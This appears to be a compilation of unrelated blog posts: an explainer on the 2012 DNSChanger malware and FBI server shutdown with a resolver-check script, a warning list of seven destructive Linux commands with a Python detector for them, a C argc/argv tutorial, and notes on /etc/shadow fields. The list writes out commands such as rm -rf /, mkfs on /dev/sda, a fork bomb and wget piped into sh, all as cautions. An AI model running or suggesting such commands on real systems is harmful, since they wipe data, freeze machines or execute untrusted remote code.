DNS Virus (Internet doomsday)

On Monday, 9 July 2012, the FBI turned off servers that had allowed thousands of malware-stricken computers to continue using the Internet. The personal computers – both Windows PCs and Macs – are corrupted by a virus known as DNSChanger. Without the servers, the machines wouldn’t know how to locate websites or send email.

Years ago, an Estonian company, Rove Digital, created malware that tricked millions of people into installing the DNSChanger software, which changed certain computer settings. With the change, the victim’s computer went to a rogue server rather than a legitimate one at their company or Internet service provider. From there, the scammers were able to send victims to websites containing rogue ads from which they profited.

How were the servers supposed to function?

Databases known as domain name servers translate Internet addresses such as “ap.org” into a series of numbers your computer needs to locate other Internet-connected machines. Think of it as the Internet’s version of directory assistance for telephone numbers. If you need the number for Acme’s Flowers, you call “411” to ask for it.

How did the scam work?

In the simplest terms, think of it as “411” calls that were rerouted to a directory-assistance service operated by the scammers. You call it to ask for Acme’s Flowers, but the service gives you the number for a flower shop run by the mob. The shop still fulfills the order, so you don’t suspect anything, but it might use stolen flowers and baskets.

According to federal authorities, there were variations on how the scammers profited.

In some cases, only the ads were changed. For example, authorities say, people who went to ESPN’s website saw an ad for a timeshare business rather than the Dr. Pepper ad that was supposed to be there. In such cases, those people were still going to ESPN’s website. Normally, your computer would grab the ad displayed on ESPN from a separate, legitimate ad-placement company. Authorities say the affected computers were tricked into grabbing the scammers’ ad instead.

In other cases, authorities say, people searching through Google or Yahoo were sent to a fake search engine. They got search results that looked like Google’s or Yahoo’s but contained links to unauthorized sites. For example, people trying to reach the IRS site instead got H&R Block’s, without the tax preparer’s knowledge. Authorities say scammers got payments for referrals.

The FBI said the scam netted at least $14 million.

If this has been going on for years, why did it become a problem Monday?

Authorities busted the ring in November and arrested six suspects. The rogue databases were replaced with legitimate ones, but they were always meant to be temporary and did nothing to change the settings on individual computers. In other words, the troubled computers were still looking for databases at the rogue locations, but legitimate databases were set up at those rogue locations.

Those databases were turned off Monday with the expiration of a court order, so infected computers are now looking for databases that don’t exist. Without the information, computers don’t know where to find websites.

Continuing the phone analogy, the “411” calls during the transition period didn’t go to the usual directory-assistance service but one operated on behalf of the FBI. You’d get the correct Acme’s Flowers, not the mob operation. Since the temporary service shut down Monday, “411” calls essentially go to a disconnected line.

Are the infected computers now offline?

Not really. If your computer is corrupted, you can still reach websites if you know their numeric Internet address. But chances are, you don’t. So you are effectively offline. Imagine if all your contacts in your cellphone got wiped out. How many people would you be able to call?

In addition, some service providers are redirecting traffic on the back end so that infected machines still reach legitimate databases.

How many computers are affected?

At the time of the arrests in November, the FBI said about 4 million computers had the rogue settings, including about 500,000 in the US. Some were home computers, while others were on employees’ desks at major businesses and government agencies, including NASA. Many of the computers had been fixed since then, with the settings restored to reach normal, permanent databases. As of late Sunday, just before the temporary databases were turned off, the FBI believed about 211,000 were still affected worldwide, including 41,800 in the US.

What has been done to fix the computers infected with DNSChanger?

For months, the FBI and private companies have been sending general warnings about the deadline. Some Internet service providers and the social-networking service Facebook Inc. also have been directly notifying people they believe still have infected computers. Some Facebook users, for instance, got a message on their screen warning them that access to websites, emails and chat would end Monday if they didn’t correct the problem. They were given a website with more information on detecting and fixing the problem.

Nonetheless, many computers remained infected. Many users didn’t understand what was going on, let alone how to fix the problem. And some thought the warnings themselves were scams, or at least an effort by the government to spy on them.

What happens if my computer is still infected?

Several security companies have free tools to scan your computer and remove this and other threats. Chances are, if you are reading this on the Internet after Monday, 9 July 2012, your computer is OK. You can go to http://www.dns-ok.us to make sure. Even if your computer is clean, it’s a good idea to have it scanned regularly or to install security software that does it automatically on a regular basis.
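As an added example (not part of the original article), the local equivalent of the dns-ok.us check: read the resolver addresses a machine is configured with and see whether any of them falls inside a range known to belong to rogue DNS servers. The ranges used here are constructed placeholders from the documentation address blocks, not the real DNSChanger ranges, and the input is Linux resolv.conf text; on the Windows PCs and Macs the article mentions, the same addresses sit in the network settings.

```python
import ipaddress
import re

# Constructed placeholder ranges (documentation TEST-NET blocks), standing in
# for the real rogue-resolver ranges an actual check would be loaded with.
ROGUE_RANGES = [ipaddress.ip_network(n) for n in ("192.0.2.0/24", "198.51.100.0/24")]

NAMESERVER_RE = re.compile(r"^\s*nameserver\s+(\S+)")


def parse_resolvers(resolv_conf_text):
    """Return the resolver addresses listed in resolv.conf-style text."""
    servers = []
    for line in resolv_conf_text.splitlines():
        line = line.split("#", 1)[0]  # drop trailing comments
        match = NAMESERVER_RE.match(line)
        if not match:
            continue
        try:
            servers.append(ipaddress.ip_address(match.group(1)))
        except ValueError:
            pass  # malformed address: nothing to check
    return servers


def check_resolvers(resolv_conf_text, rogue_ranges=ROGUE_RANGES):
    """Map each configured resolver to the rogue range it falls in, or None."""
    verdicts = {}
    for addr in parse_resolvers(resolv_conf_text):
        hit = next((str(net) for net in rogue_ranges if addr in net), None)
        verdicts[str(addr)] = hit
    return verdicts


# Constructed resolv.conf: the ISP's resolver plus one the malware wrote in.
SAMPLE_RESOLV_CONF = """\
# Generated by the network manager
search home.example
nameserver 10.0.0.1
nameserver 192.0.2.53   # rewritten by DNSChanger (constructed)
"""

if __name__ == "__main__":
    for server, rogue in check_resolvers(SAMPLE_RESOLV_CONF).items():
        print(f"{server}: {'ROGUE, inside ' + rogue if rogue else 'ok'}")
```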

More details on fixing your computer can be found here: http://www.dcwg.org/fix




7 Most Dangerous Commands Of Linux !!

1. rm -rf /
This powerful command deletes every file under the root directory “/”.

2. Obfuscated code


This is a hex-encoded version of rm -rf /, written so that users not experienced with GNU/Linux won’t recognise what it does.

3. mkfs.ext3 /dev/sda

This will reformat the device named after the mkfs command, destroying all the files on it.

4. :(){:|:&};:

Known as a fork bomb, this command keeps spawning processes until the system freezes. It can lead to data corruption.

5. any_command > /dev/sda

This command causes total loss of data on the partition named in the command.

6. wget http://some_untrusted_source -O - | sh

Never download a script from an untrusted source and run it straight away like this; it may contain malicious code.

7. mv /home/yourhomedirectory/* /dev/null

This command moves all the files in your home directory to a place that does not exist, so they are lost.

[Ref: http://www.linuxpromagazine.com/online/news/seven_deadliest_linux_commands?category=13447]
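As an added example (not from the original post or the referenced article), a small pre-flight check that flags the seven patterns above when they turn up in a script or in shell history, so a person can review the lines before anything is run. The regexes allow whitespace and flag-order variants; the sample script at the bottom is constructed for the demo.

```python
import re

# Each rule: (reason, compiled regex). Whitespace and flag order may vary,
# so "rm -fr /" and "rm -rf /*" are caught as well as "rm -rf /".
RULES = [
    ("recursive delete of the root filesystem",
     re.compile(r"(?:^|[;&|\s])rm\s+-[A-Za-z]*[rR][A-Za-z]*\s+/+(?:[\s*;]|$)")),
    ("filesystem creation on a block device",
     re.compile(r"(?:^|[;&|\s])mkfs(?:\.\w+)?\s.*/dev/")),
    ("fork bomb",
     re.compile(r":\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;\s*:")),
    ("output redirected onto a raw block device",
     re.compile(r">\s*/dev/(?:sd|hd|vd|nvme|mmcblk)")),
    ("remote script piped straight into a shell",
     re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh(?:\s|$)")),
    ("files moved into /dev/null",
     re.compile(r"(?:^|[;&|\s])mv\s+.*\s/dev/null(?:\s|$)")),
]


def flag_dangerous(line):
    """Return why the command line is dangerous, or None if no rule matches."""
    for reason, pattern in RULES:
        if pattern.search(line):
            return reason
    return None


def scan_script(text):
    """Return (line_number, reason, line) for every flagged line of a script."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        reason = flag_dangerous(line)
        if reason:
            hits.append((number, reason, line))
    return hits


# Constructed sample script: two harmless lines and three from the list above.
SAMPLE_SCRIPT = """\
ls -la /
rm -rf /tmp/build
rm -rf /
:(){ :|:& };:
wget http://some_untrusted_source -O - | sh
"""

if __name__ == "__main__":
    for number, reason, line in scan_script(SAMPLE_SCRIPT):
        print(f"line {number}: {reason}: {line}")
```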

Explaining (int argc, char *argv[])

You have all often come across this while reading C or C++ code. I just want to explain it briefly, especially for the newbies who find the concept difficult to understand.

Here argc is the number of command-line arguments, and argv is the argument vector: an array of pointers to those arguments.
Suppose I am compiling a C program ‘test.c’; what I type at the command line is

$ gcc test.c -o test
$ ./test                // run the executable file test

so here argc=1, as the number of command-line arguments is one (the program name itself), and argv[0]=./test

similarly if executable is run as

$ ./test <arg1> <arg2>

then argc=3, argv[0]=./test, argv[1]=arg1 and argv[2]=arg2

Below is the C code I have written; try it for a better understanding of this concept. Have lots of fun with C code 🙂

#include <stdio.h>

int main(int argc, char *argv[])
{
    int i;
    /* argc counts the program name too, so argv[0] is always present */
    printf("argc = %d\n", argc);
    for (i = 0; i < argc; i++)
        printf("argv[%d] = %s\n", i, argv[i]);
    return 0;
}

Some Details on Format of /etc/shadow

Hi everyone,

I often used to wonder about the format of the /etc/shadow file, and with a little research I came across some useful information about it. So here I am going to list some details about the format of the /etc/shadow file; do read it carefully, hope you will enjoy it 🙂

The format

All fields are separated by a colon (:) symbol:

User name: your login name
Password: your encrypted password. The password should be a minimum of 6-8 characters long, including special characters/digits
Last password change (lastchanged): days since Jan 1, 1970 on which the password was last changed
Minimum: the minimum number of days required between password changes, i.e. the number of days that must pass before the user is allowed to change his/her password
Maximum: the maximum number of days the password is valid (after that the user is forced to change his/her password)
Warn: the number of days before the password expires on which the user is warned that his/her password must be changed
Inactive: the number of days after the password expires after which the account is disabled
Expire: days since Jan 1, 1970 on which the account is disabled, i.e. an absolute date specifying when the login may no longer be used

The last six fields provide password aging and account lockout features. The password field must be filled.
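As an added example (not part of the original post), a parser that splits a shadow record into the fields listed above, turns the day counts into absolute dates, and raises the findings a quick review of the password and aging fields would produce. It assumes the record shape above (real records carry a trailing reserved ninth field, which is kept but ignored); the sample record and its hash value are constructed, not taken from any system.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

EPOCH = date(1970, 1, 1)  # day counts in /etc/shadow are measured from here


@dataclass
class ShadowEntry:
    user: str
    password: str
    last_changed: Optional[int]
    minimum: Optional[int]
    maximum: Optional[int]
    warn: Optional[int]
    inactive: Optional[int]
    expire: Optional[int]


def _days(field):
    # An empty aging field means "not set"; anything else is a day count.
    return int(field) if field.strip() else None


def parse_shadow_line(line):
    """Split one record on ':' into the fields listed above."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 8:
        raise ValueError("a shadow record needs at least 8 colon-separated fields")
    return ShadowEntry(fields[0], fields[1], *(_days(f) for f in fields[2:8]))


def password_expires_on(entry):
    """Absolute date the password must be changed, or None if it never expires."""
    if entry.last_changed is None or entry.maximum is None or entry.maximum >= 99999:
        return None
    return EPOCH + timedelta(days=entry.last_changed + entry.maximum)


def audit(entry):
    """Findings a quick review of the password and aging fields would raise."""
    findings = []
    if entry.password == "":
        findings.append("empty password field: login without any password")
    elif entry.password.startswith("$1$"):
        findings.append("MD5-crypt hash ($1$): weak, re-hash with a current scheme")
    if password_expires_on(entry) is None:
        findings.append("password never expires (no maximum age)")
    return findings


# Constructed record: changed on day 15000 (26 Jan 2011), 7-day minimum,
# 90-day maximum, 7-day warning, disabled 30 days after expiry. Dummy hash.
SAMPLE = "alice:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:15000:7:90:7:30::0"
```

Running `audit(parse_shadow_line(SAMPLE))` on the record above returns no findings, while a record with an empty password field and a 99999-day maximum produces one finding for each.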